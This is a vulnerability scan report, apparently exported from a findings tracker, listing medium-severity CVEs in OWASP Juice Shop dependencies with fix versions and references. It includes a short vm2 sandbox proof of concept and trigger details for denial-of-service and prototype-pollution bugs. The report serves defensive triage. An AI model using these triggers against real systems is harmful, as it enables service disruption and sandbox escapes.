SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 400 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
brace-expansion1.1.12
+ + + + + + + +
File Path
juice-shop/node_modules/rimraf/node_modules/brace-expansion/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

brace-expansion: brace-expansion: Denial of Service via zero step value in brace pattern
+Target: Node.js
+Type: node-pkg
+Fixed version: 5.0.5, 3.0.2, 2.0.3, 1.1.13

+

The brace-expansion library generates arbitrary strings containing a +common prefix and suffix. Prior to versions 5.0.5, 3.0.2, 2.0.3, and +1.1.13, a brace pattern with a zero step value (e.g., {1..2..0}) + causes the sequence generation loop to run indefinitely, making the +process hang for seconds and allocate heaps of memory. Versions 5.0.5, +3.0.2, 2.0.3, and 1.1.13 fix the issue. As a workaround, sanitize +strings passed to expand() to ensure a step value of 0 is not used.

+ + +
Mitigation
+

5.0.5, 3.0.2, 2.0.3, 1.1.13

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33750
+https://github.com/juliangruber/brace-expansion
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184
+https://github.com/juliangruber/brace-expansion/commit/311ac0d54994158c0a384e286a7d6cbb17ee8ed5
+https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2
+https://github.com/juliangruber/brace-expansion/commit/b9cacd9e55e7a1fa588fe4b7bb1159d52f1d902a
+https://github.com/juliangruber/brace-expansion/issues/98
+https://github.com/juliangruber/brace-expansion/pull/95
+https://github.com/juliangruber/brace-expansion/pull/96
+https://github.com/juliangruber/brace-expansion/pull/97
+https://github.com/juliangruber/brace-expansion/security/advisories/GHSA-f886-m6hf-6m8v
+https://nvd.nist.gov/vuln/detail/CVE-2026-33750
+https://www.cve.org/CVERecord?id=CVE-2026-33750

+ + + + + + + +
+
+
+
+ Finding 80: CVE-2026-33750 Brace-Expansion 1.1.12 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 400 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
brace-expansion1.1.12
+ + + + + + + +
File Path
juice-shop/node_modules/sqlite3/node_modules/brace-expansion/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

brace-expansion: brace-expansion: Denial of Service via zero step value in brace pattern
+Target: Node.js
+Type: node-pkg
+Fixed version: 5.0.5, 3.0.2, 2.0.3, 1.1.13

+

The brace-expansion library generates arbitrary strings containing a +common prefix and suffix. Prior to versions 5.0.5, 3.0.2, 2.0.3, and +1.1.13, a brace pattern with a zero step value (e.g., {1..2..0}) + causes the sequence generation loop to run indefinitely, making the +process hang for seconds and allocate heaps of memory. Versions 5.0.5, +3.0.2, 2.0.3, and 1.1.13 fix the issue. As a workaround, sanitize +strings passed to expand() to ensure a step value of 0 is not used.

+ + +
Mitigation
+

5.0.5, 3.0.2, 2.0.3, 1.1.13

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33750
+https://github.com/juliangruber/brace-expansion
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184
+https://github.com/juliangruber/brace-expansion/commit/311ac0d54994158c0a384e286a7d6cbb17ee8ed5
+https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2
+https://github.com/juliangruber/brace-expansion/commit/b9cacd9e55e7a1fa588fe4b7bb1159d52f1d902a
+https://github.com/juliangruber/brace-expansion/issues/98
+https://github.com/juliangruber/brace-expansion/pull/95
+https://github.com/juliangruber/brace-expansion/pull/96
+https://github.com/juliangruber/brace-expansion/pull/97
+https://github.com/juliangruber/brace-expansion/security/advisories/GHSA-f886-m6hf-6m8v
+https://nvd.nist.gov/vuln/detail/CVE-2026-33750
+https://www.cve.org/CVERecord?id=CVE-2026-33750

+ + + + + + + +
+
+
+
+ Finding 81: CVE-2026-33750 Brace-Expansion 1.1.12 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 400 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
brace-expansion1.1.12
+ + + + + + + +
File Path
juice-shop/node_modules/ts-node-dev/node_modules/brace-expansion/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

brace-expansion: brace-expansion: Denial of Service via zero step value in brace pattern
+Target: Node.js
+Type: node-pkg
+Fixed version: 5.0.5, 3.0.2, 2.0.3, 1.1.13

+

The brace-expansion library generates arbitrary strings containing a +common prefix and suffix. Prior to versions 5.0.5, 3.0.2, 2.0.3, and +1.1.13, a brace pattern with a zero step value (e.g., {1..2..0}) + causes the sequence generation loop to run indefinitely, making the +process hang for seconds and allocate heaps of memory. Versions 5.0.5, +3.0.2, 2.0.3, and 1.1.13 fix the issue. As a workaround, sanitize +strings passed to expand() to ensure a step value of 0 is not used.

+ + +
Mitigation
+

5.0.5, 3.0.2, 2.0.3, 1.1.13

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33750
+https://github.com/juliangruber/brace-expansion
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184
+https://github.com/juliangruber/brace-expansion/commit/311ac0d54994158c0a384e286a7d6cbb17ee8ed5
+https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2
+https://github.com/juliangruber/brace-expansion/commit/b9cacd9e55e7a1fa588fe4b7bb1159d52f1d902a
+https://github.com/juliangruber/brace-expansion/issues/98
+https://github.com/juliangruber/brace-expansion/pull/95
+https://github.com/juliangruber/brace-expansion/pull/96
+https://github.com/juliangruber/brace-expansion/pull/97
+https://github.com/juliangruber/brace-expansion/security/advisories/GHSA-f886-m6hf-6m8v
+https://nvd.nist.gov/vuln/detail/CVE-2026-33750
+https://www.cve.org/CVERecord?id=CVE-2026-33750

+ + + + + + + +
+
+
+
+ Finding 82: CVE-2026-33750 Brace-Expansion 2.0.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 400 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
brace-expansion2.0.2
+ + + + + + + +
File Path
juice-shop/node_modules/brace-expansion/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

brace-expansion: brace-expansion: Denial of Service via zero step value in brace pattern
+Target: Node.js
+Type: node-pkg
+Fixed version: 5.0.5, 3.0.2, 2.0.3, 1.1.13

+

The brace-expansion library generates arbitrary strings containing a +common prefix and suffix. Prior to versions 5.0.5, 3.0.2, 2.0.3, and +1.1.13, a brace pattern with a zero step value (e.g., {1..2..0}) + causes the sequence generation loop to run indefinitely, making the +process hang for seconds and allocate heaps of memory. Versions 5.0.5, +3.0.2, 2.0.3, and 1.1.13 fix the issue. As a workaround, sanitize +strings passed to expand() to ensure a step value of 0 is not used.

+ + +
Mitigation
+

5.0.5, 3.0.2, 2.0.3, 1.1.13

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33750
+https://github.com/juliangruber/brace-expansion
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184
+https://github.com/juliangruber/brace-expansion/commit/311ac0d54994158c0a384e286a7d6cbb17ee8ed5
+https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2
+https://github.com/juliangruber/brace-expansion/commit/b9cacd9e55e7a1fa588fe4b7bb1159d52f1d902a
+https://github.com/juliangruber/brace-expansion/issues/98
+https://github.com/juliangruber/brace-expansion/pull/95
+https://github.com/juliangruber/brace-expansion/pull/96
+https://github.com/juliangruber/brace-expansion/pull/97
+https://github.com/juliangruber/brace-expansion/security/advisories/GHSA-f886-m6hf-6m8v
+https://nvd.nist.gov/vuln/detail/CVE-2026-33750
+https://www.cve.org/CVERecord?id=CVE-2026-33750

+ + + + + + + +
+
+
+
+ Finding 240: GHSA-2cm2-m3w5-gp2f Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

+ + +
Description
+

vm2 has access to VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.11.2

+

Summary

+

https://github.com/patriksimek/vm2/security/advisories/GHSA-wp5r-2gw5-m7q7 is not fully patched.

+

Details

+

It is still possible to get access to VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL.

+

PoC

+
const {VM} = require("vm2");
+const vm = new VM();
+console.log(vm.run(`
+ globalThis['VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL']
+`));
+
+ + +
Mitigation
+

3.11.2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/releases/tag/v3.11.2
+https://github.com/patriksimek/vm2/security/advisories/GHSA-2cm2-m3w5-gp2f

+ + + + + + + +
+
+
+
+ Finding 30: CVE-2025-15281 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 908 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

glibc: wordexp with WRDE_REUSE and WRDE_APPEND may return uninitialized memory
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

Calling wordexp with WRDE_REUSE in conjunction with WRDE_APPEND in +the GNU C Library version 2.0 to version 2.42 may cause the interface to + return uninitialized memory in the we_wordv member, which on subsequent + calls to wordfree may abort the process.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

http://www.openwall.com/lists/oss-security/2026/01/20/3
+https://access.redhat.com/errata/RHSA-2026:2786
+https://access.redhat.com/security/cve/CVE-2025-15281
+https://bugzilla.redhat.com/2429771
+https://bugzilla.redhat.com/2430201
+https://bugzilla.redhat.com/2431196
+https://bugzilla.redhat.com/show_bug.cgi?id=2429771
+https://bugzilla.redhat.com/show_bug.cgi?id=2430201
+https://bugzilla.redhat.com/show_bug.cgi?id=2431196
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15281
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0861
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0915
+https://errata.almalinux.org/9/ALSA-2026-2786.html
+https://errata.rockylinux.org/RLSA-2026:2786
+https://linux.oracle.com/cve/CVE-2025-15281.html
+https://linux.oracle.com/errata/ELSA-2026-50174.html
+https://nvd.nist.gov/vuln/detail/CVE-2025-15281
+https://sourceware.org/bugzilla/show_bug.cgi?id=33814
+https://ubuntu.com/security/notices/USN-8005-1
+https://www.cve.org/CVERecord?id=CVE-2025-15281
+https://www.openwall.com/lists/oss-security/2026/01/20/3

+ + + + + + + +
+
+
+
+ Finding 87: CVE-2026-27837 Dottie 2.0.6 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1321 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
dottie2.0.6
+ + + + + + + +
File Path
juice-shop/node_modules/dottie/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L

+ + +
Description
+

dottie.js: dottie.js: Unauthorized object modification via prototype pollution bypass
+Target: Node.js
+Type: node-pkg
+Fixed version: 2.0.7

+

Dottie provides nested object access and manipulation in JavaScript. +Versions 2.0.4 through 2.0.6 contain an incomplete fix for +CVE-2023-26132. The prototype pollution guard introduced in commit 7d3aee1 only validates the first segment of a dot-separated path, allowing an attacker to bypass the protection by placing __proto__ at any position other than the first. Both dottie.set() and dottie.transform() are affected. Version 2.0.7 contains an updated fix to address the residual vulnerability.

+ + +
Mitigation
+

2.0.7

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-27837
+https://github.com/advisories/GHSA-4gxf-g5gf-22h4
+https://github.com/mickhansen/dottie.js
+https://github.com/mickhansen/dottie.js/commit/7e8fa1345a4b46325f0eab8d7aeb1c4deaefdb14
+https://github.com/mickhansen/dottie.js/security/advisories/GHSA-r5mx-6wc6-7h9w
+https://nvd.nist.gov/vuln/detail/CVE-2026-27837
+https://www.cve.org/CVERecord?id=CVE-2026-27837

+ + + + + + + +
+
+
+
+ Finding 88: CVE-2022-41940 engine.io 4.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 248 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
engine.io4.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/engine.io/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

engine.io: Specially crafted HTTP request can trigger an uncaught exception
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.6.1, 6.2.1

+

Engine.IO is the implementation of transport-based +cross-browser/cross-device bi-directional communication layer for +Socket.IO. A specially crafted HTTP request can trigger an uncaught +exception on the Engine.IO server, thus killing the Node.js process. +This impacts all the users of the engine.io package, including those who + uses depending packages like socket.io. There is no known workaround +except upgrading to a safe version. There are patches for this issue +released in versions 3.6.1 and 6.2.1.

+ + +
Mitigation
+

3.6.1, 6.2.1

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2022-41940
+https://github.com/socketio/engine.io
+https://github.com/socketio/engine.io/commit/425e833ab13373edf1dd5a0706f07100db14e3c6
+https://github.com/socketio/engine.io/commit/83c4071af871fc188298d7d591e95670bf9f9085
+https://github.com/socketio/engine.io/security/advisories/GHSA-r7qp-cfhv-p84w
+https://nvd.nist.gov/vuln/detail/CVE-2022-41940
+https://www.cve.org/CVERecord?id=CVE-2022-41940

+ + + + + + + +
+
+
+
+ Finding 187: CVE-2016-1000237 Sanitize-HTML 1.4.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 79 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
sanitize-html1.4.2
+ + + + + + + +
File Path
juice-shop/node_modules/sanitize-html/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

+ + +
Description
+

XSS - Sanitization not applied recursively
+Target: Node.js
+Type: node-pkg
+Fixed version: >=1.4.3

+

sanitize-html before 1.4.3 has XSS.

+ + +
Mitigation
+
+

=1.4.3

+
+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/apostrophecms/sanitize-html/commit/762fbc7bba389f3f789cc291c1eb2b64f60f2caf
+https://github.com/apostrophecms/sanitize-html/issues/29
+https://github.com/punkave/sanitize-html/issues/29
+https://nodesecurity.io/advisories/135
+https://nvd.nist.gov/vuln/detail/CVE-2016-1000237
+https://raw.githubusercontent.com/distributedweaknessfiling/cvelist/master/2016/1000xxx/CVE-2016-1000237.json
+https://www.npmjs.com/advisories/135

+ + + + + + + +
+
+
+
+ Finding 90: CVE-2026-31808 File-Type 16.5.4 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 835 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
file-type16.5.4
+ + + + + + + +
File Path
juice-shop/node_modules/file-type/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

+ + +
Description
+

file-type: file-type: Denial of Service due to infinite loop in ASF file parsing
+Target: Node.js
+Type: node-pkg
+Fixed version: 21.3.1

+

file-type detects the file type of a file, stream, or data. Prior to +21.3.1, a denial of service vulnerability exists in the ASF (WMV/WMA) +file type detection parser. When parsing a crafted input where an ASF +sub-header has a size field of zero, the parser enters an infinite loop. + The payload value becomes negative (-24), causing +tokenizer.ignore(payload) to move the read position backwards, so the +same sub-header is read repeatedly forever. Any application that uses +file-type to detect the type of untrusted/attacker-controlled input is +affected. An attacker can stall the Node.js event loop with a 55-byte +payload. Fixed in version 21.3.1.

+ + +
Mitigation
+

21.3.1

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-31808
+https://github.com/sindresorhus/file-type
+https://github.com/sindresorhus/file-type/commit/319abf871b50ba2fa221b4a7050059f1ae096f4f
+https://github.com/sindresorhus/file-type/security/advisories/GHSA-5v7r-6r5c-r473
+https://nvd.nist.gov/vuln/detail/CVE-2026-31808
+https://www.cve.org/CVERecord?id=CVE-2026-31808

+ + + + + + + +
+
+
+
+ Finding 188: CVE-2017-16016 Sanitize-HTML 1.4.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 79 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
sanitize-html1.4.2
+ + + + + + + +
File Path
juice-shop/node_modules/sanitize-html/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

+ + +
Description
+

Cross-Site Scripting in sanitize-html
+Target: Node.js
+Type: node-pkg
+Fixed version: 1.11.4

+

Sanitize-html is a library for scrubbing html input of malicious +values. Versions 1.11.1 and below are vulnerable to cross site scripting + (XSS) in certain scenarios: If allowed at least one nonTextTags, the +result is a potential XSS vulnerability.

+ + +
Mitigation
+

1.11.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/advisories/GHSA-xc6g-ggrc-qq4r
+https://github.com/punkave/sanitize-html/commit/5d205a1005ba0df80e21d8c64a15bb3accdb2403
+https://github.com/punkave/sanitize-html/commit/5d205a1005ba0df80e21d8c64a15bb3accdb2403)))
+https://github.com/punkave/sanitize-html/issues/100
+https://nodesecurity.io/advisories/154
+https://npmjs.com/package/sanitize-html#discarding-the-entire-contents-of-a-disallowed-tag
+https://nvd.nist.gov/vuln/detail/CVE-2017-16016
+https://www.npmjs.com/advisories/154

+ + + + + + + +
+
+
+
+ Finding 92: CVE-2022-33987 Got 8.3.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
got8.3.2
+ + + + + + + +
File Path
juice-shop/node_modules/got/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

+ + +
Description
+

nodejs-got: missing verification of requested URLs allows redirects to UNIX sockets
+Target: Node.js
+Type: node-pkg
+Fixed version: 12.1.0, 11.8.5

+

The got package before 12.1.0 (also fixed in 11.8.5) for Node.js allows a redirect to a UNIX socket.

+ + +
Mitigation
+

12.1.0, 11.8.5

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2022:6595
+https://access.redhat.com/security/cve/CVE-2022-33987
+https://bugzilla.redhat.com/1907444
+https://bugzilla.redhat.com/1945459
+https://bugzilla.redhat.com/1964461
+https://bugzilla.redhat.com/2007557
+https://bugzilla.redhat.com/2098556
+https://bugzilla.redhat.com/2102001
+https://bugzilla.redhat.com/2105422
+https://bugzilla.redhat.com/2105426
+https://bugzilla.redhat.com/2105428
+https://bugzilla.redhat.com/2105430
+https://bugzilla.redhat.com/show_bug.cgi?id=1907444
+https://bugzilla.redhat.com/show_bug.cgi?id=1945459
+https://bugzilla.redhat.com/show_bug.cgi?id=1964461
+https://bugzilla.redhat.com/show_bug.cgi?id=2007557
+https://bugzilla.redhat.com/show_bug.cgi?id=2098556
+https://bugzilla.redhat.com/show_bug.cgi?id=2102001
+https://bugzilla.redhat.com/show_bug.cgi?id=2105422
+https://bugzilla.redhat.com/show_bug.cgi?id=2105426
+https://bugzilla.redhat.com/show_bug.cgi?id=2105428
+https://bugzilla.redhat.com/show_bug.cgi?id=2105430
+https://bugzilla.redhat.com/show_bug.cgi?id=2121019
+https://bugzilla.redhat.com/show_bug.cgi?id=2124299
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28469
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7788
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33502
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3807
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29244
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32212
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32213
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32214
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32215
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-33987
+https://errata.almalinux.org/9/ALSA-2022-6595.html
+https://errata.rockylinux.org/RLSA-2022:6595
+https://github.com/sindresorhus/got
+https://github.com/sindresorhus/got/commit/861ccd9ac2237df762a9e2beed7edd88c60782dc
+https://github.com/sindresorhus/got/compare/v12.0.3...v12.1.0
+https://github.com/sindresorhus/got/pull/2047
+https://github.com/sindresorhus/got/releases/tag/v11.8.5
+https://github.com/sindresorhus/got/releases/tag/v12.1.0
+https://linux.oracle.com/cve/CVE-2022-33987.html
+https://linux.oracle.com/errata/ELSA-2022-6595.html
+https://nvd.nist.gov/vuln/detail/CVE-2022-33987
+https://www.cve.org/CVERecord?id=CVE-2022-33987

+ + + + + + + +
+
+
+
+ Finding 189: CVE-2019-25225 Sanitize-HTML 1.4.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 79 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
sanitize-html1.4.2
+ + + + + + + +
File Path
juice-shop/node_modules/sanitize-html/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

+ + +
Description
+

sanitize-html: sanitize-html cross site scripting
+Target: Node.js
+Type: node-pkg
+Fixed version: 2.0.0-beta

+

sanitize-html prior to version 2.0.0-beta is vulnerable to Cross-site Scripting (XSS). The sanitizeHtml() function in index.js does not sanitize content when using the custom transformTags + option, which is intended to convert attribute values into text. As a +result, malicious input can be transformed into executable code.

+ + +
Mitigation
+

2.0.0-beta

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2019-25225
+https://github.com/Checkmarx/Vulnerabilities-Proofs-of-Concept/tree/main/2019/CVE-2019-25225
+https://github.com/apostrophecms/sanitize-html
+https://github.com/apostrophecms/sanitize-html/commit/712cb6895825c8bb6ede71a16b42bade42abcaf3
+https://github.com/apostrophecms/sanitize-html/issues/293
+https://github.com/apostrophecms/sanitize-html/pull/156
+https://nvd.nist.gov/vuln/detail/CVE-2019-25225
+https://www.cve.org/CVERecord?id=CVE-2019-25225

+ + + + + + + +
+
+
+
+ Finding 190: CVE-2021-26539 Sanitize-HTML 1.4.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
sanitize-html1.4.2
+ + + + + + + +
File Path
juice-shop/node_modules/sanitize-html/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

+ + +
Description
+

sanitize-html: improper handling of internationalized domain name (IDN) can lead to bypass hostname whitelist validation
+Target: Node.js
+Type: node-pkg
+Fixed version: 2.3.1

+

Apostrophe Technologies sanitize-html before 2.3.1 does not properly +handle internationalized domain name (IDN) which could allow an attacker + to bypass hostname whitelist validation set by the +"allowedIframeHostnames" option.

+ + +
Mitigation
+

2.3.1

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2021-26539
+https://advisory.checkmarx.net/advisory/CX-2021-4308
+https://github.com/apostrophecms/sanitize-html
+https://github.com/apostrophecms/sanitize-html/blob/main/CHANGELOG.md#231-2021-01-22
+https://github.com/apostrophecms/sanitize-html/commit/bdf7836ef8f0e5b21f9a1aab0623ae8fcd09c1da
+https://github.com/apostrophecms/sanitize-html/pull/458
